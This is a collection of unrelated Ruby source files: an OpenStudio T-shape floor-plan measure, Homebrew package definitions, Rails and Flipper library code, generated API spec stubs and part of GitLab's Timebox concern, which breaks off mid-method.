# ===== hexsha: 112598eec22e2f05fa39e43ecaac4da94cc720e6 =====
######################################################################
# Copyright (c) 2008-2015, Alliance for Sustainable Energy.
# All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
######################################################################
class SetTShapeFloorPlan < OpenStudio::Ruleset::ModelUserScript
# override name to return the name of your script
def name
return "Set T-Shape Floor Plan"
end
# return a vector of arguments
def arguments(model)
result = OpenStudio::Ruleset::OSArgumentVector.new
length = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("length",false)
length.setDisplayName("Building Length (m)")
length.setDefaultValue(40.0)
result << length
width = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("width",false)
width.setDisplayName("Building Width (m)")
width.setDefaultValue(40.0)
result << width
upper_end_width = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("upper_end_width",false)
upper_end_width.setDisplayName("Upper End Width (m)")
upper_end_width.setDefaultValue(20.0)
result << upper_end_width
lower_end_length = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("lower_end_length",false)
lower_end_length.setDisplayName("Lower End Length (m)")
lower_end_length.setDefaultValue(20.0)
result << lower_end_length
left_end_offset = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("left_end_offset",false)
left_end_offset.setDisplayName("Left End Offset (m)")
left_end_offset.setDefaultValue(10.0)
result << left_end_offset
num_floors = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("num_floors",false)
num_floors.setDisplayName("Number of Floors")
num_floors.setDefaultValue(1.0)
result << num_floors
floor_to_floor_height = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("floor_to_floor_height",false)
floor_to_floor_height.setDisplayName("Floor to Floor Height (m)")
floor_to_floor_height.setDefaultValue(3.8)
result << floor_to_floor_height
plenum_height = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("plenum_height", false)
plenum_height.setDisplayName("Plenum Height (m)")
plenum_height.setDefaultValue(1.0)
result << plenum_height
perimeter_zone_depth = OpenStudio::Ruleset::OSArgument::makeDoubleArgument("perimeter_zone_depth", false)
perimeter_zone_depth.setDisplayName("Perimeter Zone Depth (m)")
perimeter_zone_depth.setDefaultValue(4.57)
result << perimeter_zone_depth
return result
end
def run(model, runner, user_arguments)
super(model, runner, user_arguments)
if not runner.validateUserArguments(arguments(model),user_arguments)
return false
end
length = runner.getDoubleArgumentValue("length",user_arguments)
width = runner.getDoubleArgumentValue("width",user_arguments)
upper_end_width = runner.getDoubleArgumentValue("upper_end_width",user_arguments)
lower_end_length = runner.getDoubleArgumentValue("lower_end_length",user_arguments)
left_end_offset = runner.getDoubleArgumentValue("left_end_offset",user_arguments)
num_floors = runner.getDoubleArgumentValue("num_floors",user_arguments)
floor_to_floor_height = runner.getDoubleArgumentValue("floor_to_floor_height",user_arguments)
plenum_height = runner.getDoubleArgumentValue("plenum_height",user_arguments)
perimeter_zone_depth = runner.getDoubleArgumentValue("perimeter_zone_depth",user_arguments)
if length <= 1e-4
runner.registerError("Length must be greater than 0.")
return false
end
if width <= 1e-4
runner.registerError("Width must be greater than 0.")
return false
end
if upper_end_width <= 1e-4 or upper_end_width >= (width - 1e-4)
runner.registerError("Upper end width must be greater than 0 and less than #{width}m.")
return false
end
if lower_end_length <= 1e-4 or lower_end_length >= (length - 1e-4)
runner.registerError("Lower end length must be greater than 0 and less than #{length}m.")
return false
end
if left_end_offset <= 1e-4 or left_end_offset >= (length - lower_end_length - 1e-4)
runner.registerError("Left end offset must be greater than 0 and less than #{length - lower_end_length}m.")
return false
end
if num_floors <= 1e-4
runner.registerError("Number of floors must be greater than 0.")
return false
end
if floor_to_floor_height <= 1e-4
runner.registerError("Floor to floor height must be greater than 0.")
return false
end
if plenum_height < 0
runner.registerError("Plenum height must be greater than or equal to 0.")
return false
end
shortest_side = [length,width,upper_end_width,lower_end_length].min
if perimeter_zone_depth < 0 or 2*perimeter_zone_depth >= (shortest_side - 1e-4)
runner.registerError("Perimeter zone depth must be greater than or equal to 0 and less than #{shortest_side/2}m.")
return false
end
# Create progress bar
runner.createProgressBar("Creating Spaces")
num_total = perimeter_zone_depth>0 ? num_floors*10 : num_floors*2
num_complete = 0
# Loop through the number of floors
for floor in (0..num_floors-1)
z = floor_to_floor_height * floor
#Create a new story within the building
story = OpenStudio::Model::BuildingStory.new(model)
story.setNominalFloortoFloorHeight(floor_to_floor_height)
story.setName("Story #{floor+1}")
lower_ne_point = OpenStudio::Point3d.new(left_end_offset,width - upper_end_width,z)
upper_sw_point = OpenStudio::Point3d.new(0,width - upper_end_width,z)
upper_nw_point = OpenStudio::Point3d.new(0,width,z)
upper_ne_point = OpenStudio::Point3d.new(length,width,z)
upper_se_point = OpenStudio::Point3d.new(length,width - upper_end_width,z)
lower_nw_point = OpenStudio::Point3d.new(left_end_offset + lower_end_length,width - upper_end_width,z)
lower_se_point = OpenStudio::Point3d.new(left_end_offset + lower_end_length,0,z)
lower_sw_point = OpenStudio::Point3d.new(left_end_offset,0,z)
# Identity matrix for setting space origins
m = OpenStudio::Matrix.new(4,4,0)
m[0,0] = 1
m[1,1] = 1
m[2,2] = 1
m[3,3] = 1
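# Note: m is a 4x4 homogeneous transform. The identity set above carries no
# rotation or scaling; the translation column (m[0,3]..m[2,3]) is filled in
# below with each space's origin before wrapping it in a Transformation.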
# Define polygons for a T-shape building with perimeter and core zoning
if perimeter_zone_depth > 0
perimeter_lower_ne_point = lower_ne_point + OpenStudio::Vector3d.new(perimeter_zone_depth,perimeter_zone_depth,0)
perimeter_upper_sw_point = upper_sw_point + OpenStudio::Vector3d.new(perimeter_zone_depth,perimeter_zone_depth,0)
perimeter_upper_nw_point = upper_nw_point + OpenStudio::Vector3d.new(perimeter_zone_depth,-perimeter_zone_depth,0)
perimeter_upper_ne_point = upper_ne_point + OpenStudio::Vector3d.new(-perimeter_zone_depth,-perimeter_zone_depth,0)
perimeter_upper_se_point = upper_se_point + OpenStudio::Vector3d.new(-perimeter_zone_depth,perimeter_zone_depth,0)
perimeter_lower_nw_point = lower_nw_point + OpenStudio::Vector3d.new(-perimeter_zone_depth,perimeter_zone_depth,0)
perimeter_lower_se_point = lower_se_point + OpenStudio::Vector3d.new(-perimeter_zone_depth,perimeter_zone_depth,0)
perimeter_lower_sw_point = lower_sw_point + OpenStudio::Vector3d.new(perimeter_zone_depth,perimeter_zone_depth,0)
west_lower_perimeter_polygon = OpenStudio::Point3dVector.new
west_lower_perimeter_polygon << lower_sw_point
west_lower_perimeter_polygon << lower_ne_point
west_lower_perimeter_polygon << perimeter_lower_ne_point
west_lower_perimeter_polygon << perimeter_lower_sw_point
west_lower_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(west_lower_perimeter_polygon, floor_to_floor_height, model)
west_lower_perimeter_space = west_lower_perimeter_space.get
m[0,3] = lower_sw_point.x
m[1,3] = lower_sw_point.y
m[2,3] = lower_sw_point.z
west_lower_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
west_lower_perimeter_space.setBuildingStory(story)
west_lower_perimeter_space.setName("Story #{floor+1} West Lower Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
south_upper_left_perimeter_polygon = OpenStudio::Point3dVector.new
south_upper_left_perimeter_polygon << lower_ne_point
south_upper_left_perimeter_polygon << upper_sw_point
south_upper_left_perimeter_polygon << perimeter_upper_sw_point
south_upper_left_perimeter_polygon << perimeter_lower_ne_point
south_upper_left_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(south_upper_left_perimeter_polygon, floor_to_floor_height, model)
south_upper_left_perimeter_space = south_upper_left_perimeter_space.get
m[0,3] = upper_sw_point.x
m[1,3] = upper_sw_point.y
m[2,3] = upper_sw_point.z
south_upper_left_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
south_upper_left_perimeter_space.setBuildingStory(story)
south_upper_left_perimeter_space.setName("Story #{floor+1} South Upper Left Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
west_upper_perimeter_polygon = OpenStudio::Point3dVector.new
west_upper_perimeter_polygon << upper_sw_point
west_upper_perimeter_polygon << upper_nw_point
west_upper_perimeter_polygon << perimeter_upper_nw_point
west_upper_perimeter_polygon << perimeter_upper_sw_point
west_upper_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(west_upper_perimeter_polygon, floor_to_floor_height, model)
west_upper_perimeter_space = west_upper_perimeter_space.get
m[0,3] = upper_sw_point.x
m[1,3] = upper_sw_point.y
m[2,3] = upper_sw_point.z
west_upper_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
west_upper_perimeter_space.setBuildingStory(story)
west_upper_perimeter_space.setName("Story #{floor+1} West Upper Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
north_perimeter_polygon = OpenStudio::Point3dVector.new
north_perimeter_polygon << upper_nw_point
north_perimeter_polygon << upper_ne_point
north_perimeter_polygon << perimeter_upper_ne_point
north_perimeter_polygon << perimeter_upper_nw_point
north_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(north_perimeter_polygon, floor_to_floor_height, model)
north_perimeter_space = north_perimeter_space.get
m[0,3] = perimeter_upper_nw_point.x
m[1,3] = perimeter_upper_nw_point.y
m[2,3] = perimeter_upper_nw_point.z
north_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
north_perimeter_space.setBuildingStory(story)
north_perimeter_space.setName("Story #{floor+1} North Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
east_upper_perimeter_polygon = OpenStudio::Point3dVector.new
east_upper_perimeter_polygon << upper_ne_point
east_upper_perimeter_polygon << upper_se_point
east_upper_perimeter_polygon << perimeter_upper_se_point
east_upper_perimeter_polygon << perimeter_upper_ne_point
east_upper_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(east_upper_perimeter_polygon, floor_to_floor_height, model)
east_upper_perimeter_space = east_upper_perimeter_space.get
m[0,3] = perimeter_upper_se_point.x
m[1,3] = perimeter_upper_se_point.y
m[2,3] = perimeter_upper_se_point.z
east_upper_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
east_upper_perimeter_space.setBuildingStory(story)
east_upper_perimeter_space.setName("Story #{floor+1} East Upper Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
south_upper_right_perimeter_polygon = OpenStudio::Point3dVector.new
south_upper_right_perimeter_polygon << upper_se_point
south_upper_right_perimeter_polygon << lower_nw_point
south_upper_right_perimeter_polygon << perimeter_lower_nw_point
south_upper_right_perimeter_polygon << perimeter_upper_se_point
south_upper_right_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(south_upper_right_perimeter_polygon, floor_to_floor_height, model)
south_upper_right_perimeter_space = south_upper_right_perimeter_space.get
m[0,3] = lower_nw_point.x
m[1,3] = lower_nw_point.y
m[2,3] = lower_nw_point.z
south_upper_right_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
south_upper_right_perimeter_space.setBuildingStory(story)
south_upper_right_perimeter_space.setName("Story #{floor+1} South Upper Right Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
east_lower_perimeter_polygon = OpenStudio::Point3dVector.new
east_lower_perimeter_polygon << lower_nw_point
east_lower_perimeter_polygon << lower_se_point
east_lower_perimeter_polygon << perimeter_lower_se_point
east_lower_perimeter_polygon << perimeter_lower_nw_point
east_lower_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(east_lower_perimeter_polygon, floor_to_floor_height, model)
east_lower_perimeter_space = east_lower_perimeter_space.get
m[0,3] = perimeter_lower_se_point.x
m[1,3] = perimeter_lower_se_point.y
m[2,3] = perimeter_lower_se_point.z
east_lower_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
east_lower_perimeter_space.setBuildingStory(story)
east_lower_perimeter_space.setName("Story #{floor+1} East Lower Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
south_lower_perimeter_polygon = OpenStudio::Point3dVector.new
south_lower_perimeter_polygon << lower_se_point
south_lower_perimeter_polygon << lower_sw_point
south_lower_perimeter_polygon << perimeter_lower_sw_point
south_lower_perimeter_polygon << perimeter_lower_se_point
south_lower_perimeter_space = OpenStudio::Model::Space::fromFloorPrint(south_lower_perimeter_polygon, floor_to_floor_height, model)
south_lower_perimeter_space = south_lower_perimeter_space.get
m[0,3] = lower_sw_point.x
m[1,3] = lower_sw_point.y
m[2,3] = lower_sw_point.z
south_lower_perimeter_space.changeTransformation(OpenStudio::Transformation.new(m))
south_lower_perimeter_space.setBuildingStory(story)
south_lower_perimeter_space.setName("Story #{floor+1} South Lower Perimeter Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
north_core_polygon = OpenStudio::Point3dVector.new
north_core_polygon << perimeter_upper_sw_point
north_core_polygon << perimeter_upper_nw_point
north_core_polygon << perimeter_upper_ne_point
north_core_polygon << perimeter_upper_se_point
north_core_polygon << perimeter_lower_nw_point
north_core_polygon << perimeter_lower_ne_point
north_core_space = OpenStudio::Model::Space::fromFloorPrint(north_core_polygon, floor_to_floor_height, model)
north_core_space = north_core_space.get
m[0,3] = perimeter_upper_sw_point.x
m[1,3] = perimeter_upper_sw_point.y
m[2,3] = perimeter_upper_sw_point.z
north_core_space.changeTransformation(OpenStudio::Transformation.new(m))
north_core_space.setBuildingStory(story)
north_core_space.setName("Story #{floor+1} North Core Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
south_core_polygon = OpenStudio::Point3dVector.new
south_core_polygon << perimeter_lower_sw_point
south_core_polygon << perimeter_lower_ne_point
south_core_polygon << perimeter_lower_nw_point
south_core_polygon << perimeter_lower_se_point
south_core_space = OpenStudio::Model::Space::fromFloorPrint(south_core_polygon, floor_to_floor_height, model)
south_core_space = south_core_space.get
m[0,3] = perimeter_lower_sw_point.x
m[1,3] = perimeter_lower_sw_point.y
m[2,3] = perimeter_lower_sw_point.z
south_core_space.changeTransformation(OpenStudio::Transformation.new(m))
south_core_space.setBuildingStory(story)
south_core_space.setName("Story #{floor+1} South Core Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
# Minimal zones
else
north_polygon = OpenStudio::Point3dVector.new
north_polygon << upper_sw_point
north_polygon << upper_nw_point
north_polygon << upper_ne_point
north_polygon << upper_se_point
north_polygon << lower_nw_point
north_polygon << lower_ne_point
north_space = OpenStudio::Model::Space::fromFloorPrint(north_polygon, floor_to_floor_height, model)
north_space = north_space.get
m[0,3] = upper_sw_point.x
m[1,3] = upper_sw_point.y
m[2,3] = upper_sw_point.z
north_space.changeTransformation(OpenStudio::Transformation.new(m))
north_space.setBuildingStory(story)
north_space.setName("Story #{floor+1} North Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
south_polygon = OpenStudio::Point3dVector.new
south_polygon << lower_sw_point
south_polygon << lower_ne_point
south_polygon << lower_nw_point
south_polygon << lower_se_point
south_space = OpenStudio::Model::Space::fromFloorPrint(south_polygon, floor_to_floor_height, model)
south_space = south_space.get
m[0,3] = lower_sw_point.x
m[1,3] = lower_sw_point.y
m[2,3] = lower_sw_point.z
south_space.changeTransformation(OpenStudio::Transformation.new(m))
south_space.setBuildingStory(story)
south_space.setName("Story #{floor+1} South Space")
num_complete += 1
runner.updateProgress(100*num_complete/num_total)
end
#Set vertical story position
story.setNominalZCoordinate(z)
end #End of floor loop
runner.destroyProgressBar
end
end
SetTShapeFloorPlan.new.registerWithApplication
# ===== hexsha: e20ea0329262243c945799d5ef5a1cd711bf30d5 =====
cask "freeplane" do
version "1.8.6"
sha256 "72cbc35735f8e67023a254696b59b32ecd56b18a199d170fe66a00b422bc24b5"
# downloads.sourceforge.net/freeplane/ was verified as official when first introduced to the cask
url "https://downloads.sourceforge.net/freeplane/freeplane%20stable/Freeplane-#{version}.dmg"
appcast "https://sourceforge.net/projects/freeplane/rss?path=/freeplane%20stable"
name "Freeplane"
homepage "https://freeplane.sourceforge.io/"
app "Freeplane.app"
end
# ===== hexsha: 38fca4b920d2bdb9ad77b3b9961645d3d6a2eca0 =====
# Encoding: utf-8
# Cloud Foundry Java Buildpack
# Copyright 2013-2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'java_buildpack/component'
require 'java_buildpack/util/qualify_path'
module JavaBuildpack
module Component
# An abstraction encapsulating the Environment Variables of an application.
#
# A new instance of this type should be created once for the application.
class EnvironmentVariables < Array
include JavaBuildpack::Util
# Creates an instance of the Environment Variables abstraction.
#
# @param [Pathname] droplet_root the root directory of the droplet
def initialize(droplet_root)
@droplet_root = droplet_root
end
# Adds an environment variable. Prepends +$PWD+ to any variable values that are
# paths (relative to the droplet root) to ensure that the path is always accurate.
#
# @param [String] key the variable name
# @param [String] value the variable value
# @return [EnvironmentVariables] +self+ for chaining
def add_environment_variable(key, value)
self << "#{key}=#{qualify_value(value)}"
end
# Returns the contents as an environment variable formatted as +<key>=<value>+
#
# @return [String] the contents as an environment variable
def as_env_vars
join(' ')
end
private
def qualify_value(value)
value.respond_to?(:relative_path_from) ? qualify_path(value) : value
end
end
end
end
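# A minimal usage sketch (the droplet root path is hypothetical; plain String
# values pass through unqualified, path values get qualified relative to it):
#
#   require 'pathname'
#   vars = JavaBuildpack::Component::EnvironmentVariables.new(Pathname.new('/tmp/droplet'))
#   vars.add_environment_variable('JAVA_OPTS', '-Xmx384m')
#   vars.as_env_vars # => "JAVA_OPTS=-Xmx384m"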
# ===== hexsha: 7adfc980eede7f85bbf6a91c1f82c1dd166666c5 =====
=begin
#SendinBlue API
#SendinBlue provides a RESTful API that can be used with any language. With this API, you will be able to:
# - Manage your campaigns and get the statistics
# - Manage your contacts
# - Send transactional Emails and SMS
# - and much more...
#You can download our wrappers at https://github.com/orgs/sendinblue
#
#**Possible responses**
#
#| Code | Message |
#| :--: | ------- |
#| 200 | OK. Successful Request |
#| 201 | OK. Successful Creation |
#| 202 | OK. Request accepted |
#| 204 | OK. Successful Update/Deletion |
#| 400 | Error. Bad Request |
#| 401 | Error. Authentication Needed |
#| 402 | Error. Not enough credit, plan upgrade needed |
#| 403 | Error. Permission denied |
#| 404 | Error. Object does not exist |
#| 405 | Error. Method not allowed |
#| 406 | Error. Not Acceptable |
OpenAPI spec version: 3.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for SibApiV3Sdk::GetTransacEmailContent
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'GetTransacEmailContent' do
before do
# run before each test
@instance = SibApiV3Sdk::GetTransacEmailContent.new
end
after do
# run after each test
end
describe 'test an instance of GetTransacEmailContent' do
it 'should create an instance of GetTransacEmailContent' do
expect(@instance).to be_instance_of(SibApiV3Sdk::GetTransacEmailContent)
end
end
describe 'test attribute "email"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
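# A concrete assertion along those lines (assumes the generated model exposes
# an `email` reader that defaults to nil on a freshly built instance):
expect(@instance.email).to be_nil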
end
end
describe 'test attribute "subject"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "template_id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "date"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "events"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "body"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "attachment_count"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
# ===== hexsha: e2e5023f38e049041fc29f1a8820834681eee101 =====
# frozen_string_literal: true
require "active_support/core_ext/hash/indifferent_access"
module ActionDispatch
class Request
class Utils # :nodoc:
mattr_accessor :perform_deep_munge, default: true
def self.each_param_value(params, &block)
case params
when Array
params.each { |element| each_param_value(element, &block) }
when Hash
params.each_value { |value| each_param_value(value, &block) }
when String
block.call params
end
end
def self.normalize_encode_params(params)
if perform_deep_munge
NoNilParamEncoder.normalize_encode_params params
else
ParamEncoder.normalize_encode_params params
end
end
def self.check_param_encoding(params)
case params
when Array
params.each { |element| check_param_encoding(element) }
when Hash
params.each_value { |value| check_param_encoding(value) }
when String
unless params.valid_encoding?
# Raise Rack::Utils::InvalidParameterError for consistency with Rack.
# ActionDispatch::Request#GET will re-raise as a BadRequest error.
raise Rack::Utils::InvalidParameterError, "Invalid encoding for parameter: #{params.scrub}"
end
end
end
def self.set_binary_encoding(request, params, controller, action)
BinaryParamEncoder.encode(request, params, controller, action)
end
class ParamEncoder # :nodoc:
# Convert nested Hash to HashWithIndifferentAccess.
def self.normalize_encode_params(params)
case params
when Array
handle_array params
when Hash
if params.has_key?(:tempfile)
ActionDispatch::Http::UploadedFile.new(params)
else
params.transform_values do |val|
normalize_encode_params(val)
end.with_indifferent_access
end
else
params
end
end
def self.handle_array(params)
params.map! { |el| normalize_encode_params(el) }
end
end
# Remove nils from the params hash.
class NoNilParamEncoder < ParamEncoder # :nodoc:
def self.handle_array(params)
list = super
list.compact!
list
end
end
class BinaryParamEncoder # :nodoc:
def self.encode(request, params, controller, action)
return params unless controller && controller.valid_encoding?
if binary_params_for?(request, controller, action)
ActionDispatch::Request::Utils.each_param_value(params.except(:controller, :action)) do |param|
param.force_encoding ::Encoding::ASCII_8BIT
end
end
params
end
def self.binary_params_for?(request, controller, action)
request.controller_class_for(controller).binary_params_for?(action)
rescue MissingController
false
end
end
end
end
end
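# A small sketch of the default (deep-munge) behaviour, assuming ActiveSupport
# is loaded:
#
#   ActionDispatch::Request::Utils.normalize_encode_params(
#     'user' => { 'name' => 'x', 'roles' => ['admin', nil] }
#   )
#   # => HashWithIndifferentAccess with the nil array element removed:
#   #    { "user" => { "name" => "x", "roles" => ["admin"] } }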
# ===== hexsha: ff22f1900f3a02cbe601905a604de209674661bf =====
require 'flipper/ui/action'
require 'flipper/ui/decorators/feature'
module Flipper
module UI
module Actions
class PercentageOfActorsGate < UI::Action
route %r{features/[^/]*/percentage_of_actors/?\Z}
def post
feature_name = Rack::Utils.unescape(request.path.split("/")[-2])
feature = flipper[feature_name.to_sym]
@feature = Decorators::Feature.new(feature)
begin
feature.enable_percentage_of_actors params["value"]
rescue ArgumentError => exception
error = Rack::Utils.escape("Invalid percentage of actors value: #{exception.message}")
redirect_to("/features/#{@feature.key}?error=#{error}")
end
redirect_to "/features/#{@feature.key}"
end
end
end
end
end
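# For reference, this action handles a form post such as (feature name and
# value are illustrative):
#
#   POST /features/search/percentage_of_actors
#   value=25
#
# which ends up calling feature.enable_percentage_of_actors("25").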
# ===== hexsha: 219ec87a02a5b944c0988fa5f4d3771df703e060 =====
require 'formula'
class Rhash < Formula
homepage 'http://rhash.anz.ru/'
url 'http://downloads.sourceforge.net/project/rhash/rhash/1.3.0/rhash-1.3.0-src.tar.gz'
sha1 'f51a7f3eea051ebef5c16db5c4a53ff3c2ef90c2'
def install
# install target isn't parallel-safe
ENV.j1
system 'make', 'install', "PREFIX=",
"DESTDIR=#{prefix}",
"CC=#{ENV.cc}"
end
end
# ===== hexsha: 5d2aaa174b329074b445b7816902020352f41964 =====
#---
# Excerpted from "The RSpec Book",
# published by The Pragmatic Bookshelf.
# Copyrights apply to this code. It may not be used to create training material,
# courses, books, articles, and the like. Contact us if you are in doubt.
# We make no guarantees that this code is fit for any purpose.
# Visit http://www.pragmaticprogrammer.com/titles/achbd for more book information.
#---
class User < ActiveRecord::Base
belongs_to :subscription
has_many :received_messages, :class_name => Message.name,
:foreign_key => "recipient_id"
has_many :sent_messages, :class_name => Message.name,
:foreign_key => "sender_id"
def send_message(message_attrs)
if subscription.can_send_message?
sent_messages.create! message_attrs
end
end
end
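# A usage sketch (the Message attribute names here are assumed, not taken
# from the book's schema):
#
#   user.send_message(recipient_id: other_user.id, text: 'hello')
#   # creates a sent message only when user.subscription.can_send_message? is true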
# ===== hexsha: d53594eb5afe5726a1aa08f85b6b6a811b2917c1 =====
# frozen_string_literal: true
module Timebox
extend ActiveSupport::Concern
include AtomicInternalId
include CacheMarkdownField
include Gitlab::SQL::Pattern
include IidRoutes
include Referable
include StripAttribute
include FromUnion
TimeboxStruct = Struct.new(:title, :name, :id, :class_name) do
# Ensure these models match the interface required for exporting
def serializable_hash(_opts = {})
{ title: title, name: name, id: id }
end
def self.declarative_policy_class
"TimeboxPolicy"
end
def to_global_id
::Gitlab::GlobalId.build(self, model_name: class_name, id: id)
end
end
# Represents a "No Timebox" state used for filtering Issues and Merge
# Requests that have no timeboxes assigned.
None = TimeboxStruct.new('No Timebox', 'No Timebox', 0)
Any = TimeboxStruct.new('Any Timebox', '', -1)
Upcoming = TimeboxStruct.new('Upcoming', '#upcoming', -2)
Started = TimeboxStruct.new('Started', '#started', -3)
included do
# Defines the same constants above, but inside the including class.
const_set :None, TimeboxStruct.new("No #{self.name}", "No #{self.name}", 0, self.name)
const_set :Any, TimeboxStruct.new("Any #{self.name}", '', -1, self.name)
const_set :Upcoming, TimeboxStruct.new('Upcoming', '#upcoming', -2, self.name)
const_set :Started, TimeboxStruct.new('Started', '#started', -3, self.name)
alias_method :timebox_id, :id
validates :group, presence: true, unless: :project
validates :project, presence: true, unless: :group
validate :timebox_type_check
validate :start_date_should_be_less_than_due_date, if: proc { |m| m.start_date.present? && m.due_date.present? }
validate :dates_within_4_digits
cache_markdown_field :title, pipeline: :single_line
cache_markdown_field :description, issuable_reference_expansion_enabled: true
belongs_to :project
belongs_to :group
has_many :issues
has_many :labels, -> { distinct.reorder('labels.title') }, through: :issues
has_many :merge_requests
scope :of_projects, ->(ids) { where(project_id: ids) }
scope :of_groups, ->(ids) { where(group_id: ids) }
scope :closed, -> { with_state(:closed) }
scope :for_projects, -> { where(group: nil).includes(:project) }
scope :with_title, -> (title) { where(title: title) }
scope :for_projects_and_groups, -> (projects, groups) do
projects = projects.compact if projects.is_a? Array
projects = [] if projects.nil?
groups = groups.compact if groups.is_a? Array
groups = [] if groups.nil?
from_union([where(project_id: projects), where(group_id: groups)], remove_duplicates: false)
end
# A timebox is within the timeframe (start_date, end_date) if it overlaps
# with that timeframe:
#
# [ timeframe ]
# ----| ................ # Not overlapping
# |--| ................ # Not overlapping
# ------|............... # Overlapping
# -----------------------| # Overlapping
# ---------|............ # Overlapping
# |-----|............ # Overlapping
# |--------------| # Overlapping
# |--------------------| # Overlapping
# ...|-----|...... # Overlapping
# .........|-----| # Overlapping
# .........|--------- # Overlapping
# |-------------------- # Overlapping
# .........|--------| # Overlapping
# ...............|--| # Overlapping
# ............... |-| # Not Overlapping
# ............... |-- # Not Overlapping
#
# where: . = in timeframe
# ---| no start
# |--- no end
# |--| defined start and end
#
scope :within_timeframe, -> (start_date, end_date) do
where('start_date is not NULL or due_date is not NULL')
.where('start_date is NULL or start_date <= ?', end_date)
.where('due_date is NULL or due_date >= ?', start_date)
end
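# For example, timeboxes overlapping calendar year 2020 (Milestone is one
# includer of this concern):
#
#   Milestone.within_timeframe(Date.new(2020, 1, 1), Date.new(2020, 12, 31))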
strip_attributes! :title
alias_attribute :name, :title
end
class_methods do
# Searches for timeboxes with a matching title or description.
#
# This method uses ILIKE on PostgreSQL
#
# query - The search query as a String
#
# Returns an ActiveRecord::Relation.
def search(query)
fuzzy_search(query, [:title, :description])
end
def filter_by_state(timeboxes, state)
case state
when 'closed' then timeboxes.closed
when 'all' then timeboxes
else timeboxes.active
end
end
def count_by_state
reorder(nil).group(:state).count
end
def predefined_id?(id)
[Any.id, None.id, Upcoming.id, Started.id].include?(id)
end
def predefined?(timebox)
predefined_id?(timebox&.id)
end
end
##
# Returns the String necessary to reference a Timebox in Markdown. Group
# timeboxes only support name references, and do not support cross-project
# references.
#
# format - Symbol format to use (default: :iid, optional: :name)
#
# Examples:
#
# Milestone.first.to_reference # => "%1"
# Iteration.first.to_reference(format: :name) # => "*iteration:\"goal\""
# Milestone.first.to_reference(cross_namespace_project) # => "gitlab-org/gitlab-foss%1"
# Iteration.first.to_reference(same_namespace_project) # => "gitlab-foss*iteration:1"
#
def to_reference(from = nil, format: :name, full: false)
format_reference = timebox_format_reference(format)
reference = "#{self.class.reference_prefix}#{format_reference}"
if project
"#{project.to_reference_base(from, full: full)}#{reference}"
else
reference
end
end
def reference_link_text(from = nil)
self.class.reference_prefix + self.title
end
def title=(value)
write_attribute(:title, sanitize_title(value)) if value.present?
end
def timebox_name
model_name.singular
end
def group_timebox?
group_id.present?
end
def project_timebox?
project_id.present?
end
def safe_title
title.to_slug.normalize.to_s
end
def resource_parent
group || project
end
def to_ability_name
model_name.singular
end
def merge_requests_enabled?
if group_timebox?
